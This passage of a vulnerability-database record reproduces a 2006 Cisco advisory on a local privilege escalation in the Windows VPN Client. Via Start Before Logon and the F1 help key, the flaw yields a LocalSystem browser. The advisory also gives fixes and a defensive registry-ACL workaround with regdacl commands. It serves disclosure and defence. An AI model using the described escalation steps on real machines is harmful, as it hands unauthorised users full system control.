the Cisco VPN Client for\r\nWindows do not need to upgrade to version 4.8.01 or later to be\r\nprotected from this vulnerability.\r\n\r\nNo other Cisco products are currently known to be affected by this\r\nvulnerability.\r\n\r\nDetermining the Cisco VPN Client Version\r\n+---------------------------------------\r\n\r\nIn order to determine which version of the Cisco VPN Client is running\r\non the Microsoft Windows machine, open the Cisco VPN Client graphical\r\nuser interface by selecting "Programs->Cisco Systems VPN Client->VPN\r\nClient" from the Start menu and then select the option "About VPN\r\nClient..." from the "Help" menu. This will display a dialog box\r\ncontaining text similar to "Cisco Systems VPN Client Version 4.0.5(Rel)\r\n". Please note that the location of the "Cisco Systems VPN Client"\r\nfolder mentioned above in Windows' Start menu is where the program is\r\ninstalled by default; your system administrator may have chosen to use\r\na different name or location.\r\n\r\nDetails\r\n=======\r\n\r\nThe Cisco VPN Client is a software solution for the Sun Solaris, Apple\r\nMacOS Classic and MacOS X, Linux and Microsoft Windows operating\r\nsystems that allows users running these operating systems to establish\r\nIPSec VPN tunnels to Cisco VPN-capable devices like Cisco IOS routers,\r\nthe PIX Security Appliance, the VPN 3000 Series Concentrators, and the\r\nASA 5500 Series Adaptive Security Appliances.\r\n\r\nA vulnerability in the Cisco VPN Client for Windows graphical user\r\ninterface (GUI), also known as the "VPN client dialer", can be\r\nexploited to elevate user privileges and obtain LocalSystem-equivalent\r\nprivileges.\r\n\r\nThe vulnerability occurs when the Start Before Logon (SBL) feature is\r\nenabled on the Cisco VPN Client. This feature can be enabled by\r\nunprivileged users from the Cisco VPN Client GUI. Once this feature is\r\nenabled, the user will see a Cisco VPN Client GUI in the Windows logon\r\nscreen. When the user accesses Cisco VPN Client help in this GUI with\r\nthe F1 key, the Cisco VPN Client spawns a web browser process. Since no\r\nuser has logged in yet, the Cisco VPN Client is running with\r\nLocalSystem privileges, and therefore so will the spawned web browser\r\nprocess. After the logon sequence is completed, the user has a web\r\nbrowser window on the desktop, running with LocalSystem privileges.\r\n\r\nAdditional information on the SBL feature can be found at:\r\n\r\nhttp://www.cisco.com/univercd/cc/td/doc/product/vpn/client/4_6/ugwin/vc7.htm#wp1301567\r\n\r\nThis issue is not related to any known issues in Microsoft Windows\r\nitself.\r\n\r\nThis vulnerability is documented by Cisco Bug ID CSCsd79265 \r\n\r\nFor information about local system level privileges, please refer to:\r\n\r\n * The LocalSystem Account\r\n http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/base/localsystem_account.asp \r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of the vulnerability may result in a normal\r\nuser or attacker gaining full control of the system, evading any\r\ncontrols put in place by the Windows system administrator.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nWhen considering software upgrades, also consult \r\nhttp://www.cisco.com/go/psirt and any subsequent advisories to \r\ndetermine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should exercise caution to be certain the\r\ndevices to be upgraded contain sufficient memory and that current\r\nhardware and software configurations will continue to be supported\r\nproperly by the new release. If the information is not clear, contact\r\nthe Cisco Technical Assistance Center ("TAC") or your contracted\r\nmaintenance provider for assistance.\r\n\r\nThis vulnerability is fixed in version 4.8.01.0300 of the Cisco VPN\r\nClient for Windows, which can be downloaded from the following\r\nlocation:\r\n\r\nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/windows \r\n\r\nFor information on how to upgrade the Cisco VPN Client, including\r\nautomatic upgrades, please refer to the following chapter of the VPN\r\nClient Administrator Guide: Updating VPN Client Software.\r\n\r\nWorkarounds\r\n===========\r\n\r\nA workaround for this vulnerability is to prevent the LocalSystem\r\naccount (also known as "SYSTEM") from launching the application\r\nassociated with files with the ".html" extension. After applying this\r\nworkaround, pressing the F1 key on the Cisco VPN Client GUI in the\r\nWindows logon screen has no effect.\r\n\r\nThis can be accomplished by attaching an Access Control List (ACL)\r\nentry to the Windows registry keys \r\nHKEY_LOCAL_MACHINE\Software\Classes\.html and HKEY_CLASSES_ROOT\.html \r\nso that the NT-AUTHORITY\SYSTEM account is denied all access to that key.\r\n\r\nThe following example uses the tool RegDACL (Copyright(c) 1999-2001\r\nFrank Heyne Software), available from \r\nhttp://www.heysoft.de/Frames/f_sw_rt_en.htm , to apply the Windows \r\nregistry ACL mentioned above:\r\n\r\n C:\>regdacl HKLM\Software\Classes\.html /DGS:F\r\n\r\n RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above\r\n Copyright (c) 1999-2001 Frank Heyne Software (http://www.heysoft.de)\r\n This program is Freeware, use it on your own risk!\r\n\r\n\r\n Denying F access for predefined group "System"\r\n - adding new ACCESS DENY entry\r\n - removing existing entry\r\n\r\n\r\n C:\>regdacl HKCR\.html /DGS:F\r\n\r\n RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above\r\n Copyright (c) 1999-2001 Frank Heyne Software (http://www.heysoft.de)\r\n This program is Freeware, use it on your own risk!\r\n\r\n\r\n Denying F access for predefined group "System"\r\n - adding new ACCESS DENY entry\r\n - removing existing entry\r\n\r\n\r\n C:\>\r\n\r\n\r\nAnother tool that can be used to accomplish the same is the Regini.exe\r\nutility that comes with several versions of the Windows Resource Kit.\r\nFor more information on how to use Regini.exe, please visit the\r\nfollowing Microsoft Knowledge Base article:\r\n\r\n * How to Use Regini.exe to Set Permissions on Registry Keys\r\n http://support.microsoft.com/?kbid=237607 \r\n\r\nManually editing the Windows registry with RegEdit.exe will also work,\r\nbut this method does not scale when the operation needs to be performed\r\non a large number of machines.\r\n\r\nWhile Cisco has tested the above workaround in Cisco's test\r\nenvironment, the effectiveness and impact of any workaround is\r\ndependent on each customer's particular environment. Customers electing\r\nto apply any workaround (rather than upgrading to an updated version of\r\nthe Cisco VPN Client) are encouraged to test such workaround thoroughly\r\nto ensure, among other things, that it does not negatively impact any\r\nother applications that may rely on applicable functionality (e.g., the\r\nability of the LocalSystem account to launch HTML files from any\r\napplication).\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has made free software available to address this vulnerability\r\nfor affected customers. Prior to deploying software, customers should\r\nconsult their maintenance provider or check the software for feature\r\nset compatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature sets they\r\nhave purchased. By installing, downloading, accessing or otherwise\r\nusing such software upgrades, customers agree to be bound by the terms\r\nof Cisco's software license terms found at \r\nhttp://www.cisco.com/public/sw-license-agreement.html, or as otherwise \r\nset forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact either "psirt@cisco.com" or "security-alert@cisco.com"\r\nfor software upgrades.\r\n\r\nCustomers with Service Contracts\r\n+-------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third-party Support Organizations\r\n+------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreement with third-party support organizations such as\r\nCisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or\r\nfix is the most appropriate for use in the intended network before it\r\nis deployed.\r\n\r\nCustomers without Service Contracts\r\n+----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but who do not hold a Cisco\r\nservice contract and customers who purchase through third-party vendors\r\nbut are unsuccessful at obtaining fixed software through their point of\r\nsale should get their upgrades by contacting the Cisco Technical\r\nAssistance Center (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nHave your product serial number available and give the URL of this\r\nnotice as evidence of your entitlement to a free upgrade. Free upgrades\r\nfor non-contract customers must be requested through the TAC.\r\n\r\nRefer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml\r\nfor additional TAC contact information, including special localized\r\ntelephone numbers and instructions and e-mail addresses for use in\r\nvarious languages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThe Cisco PSIRT is not aware of any public announcements or malicious\r\nuse of the vulnerability described in this advisory.\r\n\r\nThis vulnerability was independently reported to Cisco by Andrew\r\nChristensen from FortConsult and by Johan Ronkainen. Cisco would like\r\nto thank them for working with us towards coordinated disclosure of\r\nthis vulnerability.\r\n\r\nApplying an ACL to the HKCR\.html registry key in order to prevent the\r\nSYSTEM account from being able to launch a web browser was suggested to\r\nCisco Systems by Johan Ronkainen.\r\n\r\nFortConsult's advisory is available at the following location:\r\n\r\nhttp://www.fortconsult.net/images/pdf/cisco_advisory_may2006.pdf\r\n\r\nStatus of This Notice: FINAL\r\n============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY\r\nKIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT\r\nYOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that\r\nomits the distribution URL in the following section is an uncontrolled\r\ncopy, and may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at \r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml.\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the\r\nfollowing e-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-teams@first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+-------------------------------------------------------------------------+\r\n| | | * Added full details about the |\r\n| | | vulnerability (see the Details |\r\n| | | section.) |\r\n| | | * Provided possible workarounds (see |\r\n| Revision 2.0 | 2006-July-27 | the Workarounds section). |\r\n| | | * Added a link to FortConsult's |\r\n| | | advisory |\r\n| | | * Changed "Status of this Notice" from |\r\n| | | INTERIM to FINAL. |\r\n|--------------+--------------+-------------------------------------------|\r\n| | | |\r\n| Revision 1.0 | 2006-May-24 | Initial public release. |\r\n| | | |\r\n+-------------------------------------------------------------------------+\r\n\r\n\r\nCisco Security Procedures\r\n\r\nComplete information on reporting security vulnerabilities in Cisco\r\nproducts, obtaining assistance with security incidents, and registering\r\nto receive security information from Cisco, is available on Cisco's\r\nworldwide website at \r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding Cisco security \r\nnotices. All Cisco security advisories are available at \r\nhttp://www.cisco.com/go/psirt.\r\n\r\n- -----------------------------------------------------------------------\r\n\r\nAll contents are Copyright 1992-2006 Cisco Systems, Inc. All rights reserved. \r\n\r\n- -----------------------------------------------------------------------\r\n\r\nUpdated: Jul 27, 2006 Document ID: 70332\r\n\r\n- -----------------------------------------------------------------------\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD4DBQFEyTX08NUAbBmDaxQRAmfZAJdBT08aOY3aEzlVTrKShKUbtfgQAKCi9Ens\r\nXqyr7KgQiRySWdOf7KU0GQ==\r\n=sLpT\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13663", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13663", "title": "[Full-disclosure] Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Privilege escalation with help subsystem.", "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:VULN:6183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6183", "title": "Cisco VPN client for Windows privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
